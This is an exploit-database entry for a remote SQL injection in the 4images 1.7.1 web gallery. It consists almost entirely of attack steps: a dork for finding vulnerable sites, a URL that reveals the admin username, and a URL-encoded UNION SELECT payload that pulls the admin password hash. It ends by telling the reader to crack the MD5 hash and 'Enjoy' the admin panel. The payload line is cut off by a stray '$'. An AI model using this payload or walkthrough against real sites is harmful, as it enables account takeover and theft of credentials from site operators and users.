4images 1.7.1 Remote SQL Injection Vulnerability

2009-12-20T00:00:00
ID 1337DAY-ID-10341
Type zdt
Reporter Master Mind
Modified 2009-12-20T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ================================================
4images 1.7.1 Remote SQL Injection Vulnerability
================================================

# Exploit Title: 4images 1.7.1 Remote SQL Injection Vulnerability
# Date: 20-12-2009
# Author: Master Mind
# Version: 1.7.1
# CVE : [N/A]
 
=============================================================
Dork : Powered By: 4images 1.7.1
 
./Exploit:
 
first search for the admin username :
ex : http://[Target.com]/path/member.php?action=showprofile&user_id=1
 
now we have the admin username
 
now we will find the password :]
ex : http://[Target.com]/path/search.php?search_user=x%2527%20union%20select%20user_password%20from%204images_users%20where%2$
 
admin = admin username
 
Crack the MD5 Hash and Enjoy :)
admin panel path : http://[Target.com]/path/admin
 
-----------------------------------------------------------------------------------------------------------------------------$



#  0day.today [2018-01-09]  #